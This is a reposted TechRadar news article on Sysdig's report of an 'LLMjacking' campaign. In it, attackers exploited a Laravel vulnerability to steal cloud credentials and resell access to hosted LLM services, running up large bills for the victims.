LLM services are being hit by hackers looking to sell on private info – TechRadar

Using cloud-hosted large language models (LLM) can be quite expensive, which is why hackers have apparently begun started stealing, and selling, login credentials to the tools.

Cybersecurity researchers Sysdig Threat Research Team recently spotted one such campaign, dubbing it LLMjacking.

In its report, Sysdig said it observed a threat actor abusing a vulnerability in the Laravel Framework, tracked as CVE-2021-3129. This flaw allowed them to access the network and scan it for Amazon Web Services (AWS) credentials for LLM services.

"Once initial access was obtained, they exfiltrated cloud credentials and gained access to the cloud environment, where they attempted to access local LLM models hosted by cloud providers," the researchers explained in the report. "In this instance, a local Claude (v2/v3) LLM model from Anthropic was targeted."

The researchers were able to discover the tools that the attackers used to generate the requests which invoked the models. Among them was a Python script that checked credentials for ten AI services, analyzing which one was useful. The services include AI21 Labs, Anthropic, AWS Bedrock, Azure, ElevenLabs, MakerSuite, Mistral, OpenAI, OpenRouter, and GCP Vertex AI.

They also discovered that the attackers didnt run any legitimate LLM queries in the verification stage, but were rather doing just enough to find out what the credentials were capable of, and any quotas.

In its news report, The Hacker News says the findings are evidence that hackers are finding new ways to weaponize LLMs, besides the usual prompt injections and model poisoning, by monetizing access to LLMs, while the bill gets mailed to the victim.

Sign up to the TechRadar Pro newsletter to get all the top news, opinion, features and guidance your business needs to succeed!

The bill, the researchers stressed, could be quite a big one, going up to $46,000 a day for LLM use.

"The use of LLM services can be expensive, depending on the model and the amount of tokens being fed to it," the researchers added. "By maximizing the quota limits, attackers can also block the compromised organization from using models legitimately, disrupting business operations."

Read more from the original source:
LLM services are being hit by hackers looking to sell on private info - TechRadar

Related Posts

Comments are closed.